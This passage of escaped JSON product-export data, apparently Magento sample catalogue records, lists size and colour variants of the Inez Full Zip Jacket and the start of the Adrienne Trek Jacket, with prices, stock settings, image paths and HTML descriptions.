\"sku\":\"WJ07-L-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Inez Full Zip Jacket-L-Orange\",\"description\":\"<p>The Inez Full Zip jacket is more than a cute layer. It\'s a full-on tech wonder you\'ll use for outdoor, pre and post workout. You\'ll love how the highlighted zipper and sleeve safety trim protect and catch looks.<\\/p>\\n<p>&bull; Purple heather inset full zip jacket.<br \\/>&bull; Full zip hoodie.<br \\/>&bull; Contrast binding along the zipper, hood and sleeves.<br \\/>&bull; Inseam pockets for storage.<br \\/>&bull; Thumbholes for comfortable fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"inez-full-zip-jacket-l-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj07-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj07-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj07-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj07-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj07-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Orange\"},\"1248\":{\"sku\":\"WJ07-L-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Inez Full Zip Jacket-L-Purple\",\"description\":\"<p>The Inez Full Zip jacket is more than a cute layer. It\'s a full-on tech wonder you\'ll use for outdoor, pre and post workout. You\'ll love how the highlighted zipper and sleeve safety trim protect and catch looks.<\\/p>\\n<p>&bull; Purple heather inset full zip jacket.<br \\/>&bull; Full zip hoodie.<br \\/>&bull; Contrast binding along the zipper, hood and sleeves.<br \\/>&bull; Inseam pockets for storage.<br \\/>&bull; Thumbholes for comfortable fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"inez-full-zip-jacket-l-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj07-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj07-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj07-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj07-purple_alt1.jpg,\\/w\\/j\\/wj07-purple_back.jpg\",\"image\":\"\\/w\\/j\\/wj07-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj07-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj07-purple_alt1.jpg,\\/w\\/j\\/wj07-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Purple\"},\"1249\":{\"sku\":\"WJ07-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Inez Full Zip Jacket-L-Red\",\"description\":\"<p>The Inez Full Zip jacket is more than a cute layer. It\'s a full-on tech wonder you\'ll use for outdoor, pre and post workout. You\'ll love how the highlighted zipper and sleeve safety trim protect and catch looks.<\\/p>\\n<p>&bull; Purple heather inset full zip jacket.<br \\/>&bull; Full zip hoodie.<br \\/>&bull; Contrast binding along the zipper, hood and sleeves.<br \\/>&bull; Inseam pockets for storage.<br \\/>&bull; Thumbholes for comfortable fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"inez-full-zip-jacket-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj07-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj07-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj07-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj07-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj07-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"1250\":{\"sku\":\"WJ07-XL-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Inez Full Zip Jacket-XL-Orange\",\"description\":\"<p>The Inez Full Zip jacket is more than a cute layer. It\'s a full-on tech wonder you\'ll use for outdoor, pre and post workout. You\'ll love how the highlighted zipper and sleeve safety trim protect and catch looks.<\\/p>\\n<p>&bull; Purple heather inset full zip jacket.<br \\/>&bull; Full zip hoodie.<br \\/>&bull; Contrast binding along the zipper, hood and sleeves.<br \\/>&bull; Inseam pockets for storage.<br \\/>&bull; Thumbholes for comfortable fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"inez-full-zip-jacket-xl-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj07-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj07-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj07-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj07-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj07-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Orange\"},\"1251\":{\"sku\":\"WJ07-XL-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Inez Full Zip Jacket-XL-Purple\",\"description\":\"<p>The Inez Full Zip jacket is more than a cute layer. It\'s a full-on tech wonder you\'ll use for outdoor, pre and post workout. You\'ll love how the highlighted zipper and sleeve safety trim protect and catch looks.<\\/p>\\n<p>&bull; Purple heather inset full zip jacket.<br \\/>&bull; Full zip hoodie.<br \\/>&bull; Contrast binding along the zipper, hood and sleeves.<br \\/>&bull; Inseam pockets for storage.<br \\/>&bull; Thumbholes for comfortable fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"inez-full-zip-jacket-xl-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj07-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj07-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj07-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj07-purple_alt1.jpg,\\/w\\/j\\/wj07-purple_back.jpg\",\"image\":\"\\/w\\/j\\/wj07-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj07-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj07-purple_alt1.jpg,\\/w\\/j\\/wj07-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Purple\"},\"1252\":{\"sku\":\"WJ07-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Inez Full Zip Jacket-XL-Red\",\"description\":\"<p>The Inez Full Zip jacket is more than a cute layer. It\'s a full-on tech wonder you\'ll use for outdoor, pre and post workout. You\'ll love how the highlighted zipper and sleeve safety trim protect and catch looks.<\\/p>\\n<p>&bull; Purple heather inset full zip jacket.<br \\/>&bull; Full zip hoodie.<br \\/>&bull; Contrast binding along the zipper, hood and sleeves.<br \\/>&bull; Inseam pockets for storage.<br \\/>&bull; Thumbholes for comfortable fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"inez-full-zip-jacket-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj07-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj07-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj07-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj07-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj07-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"1253\":{\"sku\":\"WJ07\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Inez Full Zip Jacket\",\"description\":\"<p>The Inez Full Zip jacket is more than a cute layer. It\'s a full-on tech wonder you\'ll use for outdoor, pre and post workout. You\'ll love how the highlighted zipper and sleeve safety trim protect and catch looks.<\\/p>\\n<p>&bull; Purple heather inset full zip jacket.<br \\/>&bull; Full zip hoodie.<br \\/>&bull; Contrast binding along the zipper, hood and sleeves.<br \\/>&bull; Inseam pockets for storage.<br \\/>&bull; Thumbholes for comfortable fit.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj07-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj07-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj07-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Insulated|Jacket|Hooded|Soft Shell|Full zip,material=Nylon|Polyester|Spandex|CoolTech&trade;,pattern=Color-Blocked,climate=Cool|Mild|Rainy|Spring|Windy,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WJ07-XS-Orange,size=XS,color=Orange|sku=WJ07-XS-Purple,size=XS,color=Purple|sku=WJ07-XS-Red,size=XS,color=Red|sku=WJ07-S-Orange,size=S,color=Orange|sku=WJ07-S-Purple,size=S,color=Purple|sku=WJ07-S-Red,size=S,color=Red|sku=WJ07-M-Orange,size=M,color=Orange|sku=WJ07-M-Purple,size=M,color=Purple|sku=WJ07-M-Red,size=M,color=Red|sku=WJ07-L-Orange,size=L,color=Orange|sku=WJ07-L-Purple,size=L,color=Purple|sku=WJ07-L-Red,size=L,color=Red|sku=WJ07-XL-Orange,size=XL,color=Orange|sku=WJ07-XL-Purple,size=XL,color=Purple|sku=WJ07-XL-Red,size=XL,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj07-purple_alt1.jpg,\\/w\\/j\\/wj07-purple_back.jpg\",\"image\":\"\\/w\\/j\\/wj07-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj07-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj07-purple_alt1.jpg,\\/w\\/j\\/wj07-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Insulated|Jacket|Hooded|Soft Shell|Full zip\",\"material\":\"Nylon|Polyester|Spandex|CoolTech&trade;\",\"pattern\":\"Color-Blocked\",\"climate\":\"Cool|Mild|Rainy|Spring|Windy\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1254\":{\"sku\":\"WJ08-XS-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Adrienne Trek Jacket-XS-Gray\",\"description\":\"<p>You\'re ready for a cross-country jog or a coffee on the patio in the Adrienne Trek Jacket. Its style is unique with stand collar and drawstrings, and it fits like a jacket should.<\\/p>\\n<p>&bull; gray 1\\/4 zip pullover.<br \\/>&bull; Comfortable, relaxed fit.<br \\/>&bull; Front zip for venting.<br \\/>&bull; Spacious, kangaroo pockets.<br \\/>&bull; 27\\\" body length.<br \\/>&bull; 95% Organic Cotton \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"adrienne-trek-jacket-xs-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj08-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj08-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj08-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj08-gray_alt1.jpg,\\/w\\/j\\/wj08-gray_alternate.jpg,\\/w\\/j\\/wj08-gray_back.jpg\",\"image\":\"\\/w\\/j\\/wj08-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj08-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj08-gray_alt1.jpg,\\/w\\/j\\/wj08-gray_alternate.jpg,\\/w\\/j\\/wj08-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Gray\"},\"1255\":{\"sku\":\"WJ08-XS-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Adrienne Trek Jacket-XS-Orange\",\"description\":\"<p>You\'re ready for a cross-country jog or a coffee on the patio in the Adrienne Trek Jacket. Its style is unique with stand collar and drawstrings, and it fits like a jacket should.<\\/p>\\n<p>&bull; gray 1\\/4 zip pullover.<br \\/>&bull; Comfortable, relaxed fit.<br \\/>&bull; Front zip for venting.<br \\/>&bull; Spacious, kangaroo pockets.<br \\/>&bull; 27\\\" body length.<br \\/>&bull; 95% Organic Cotton \\/ 5% 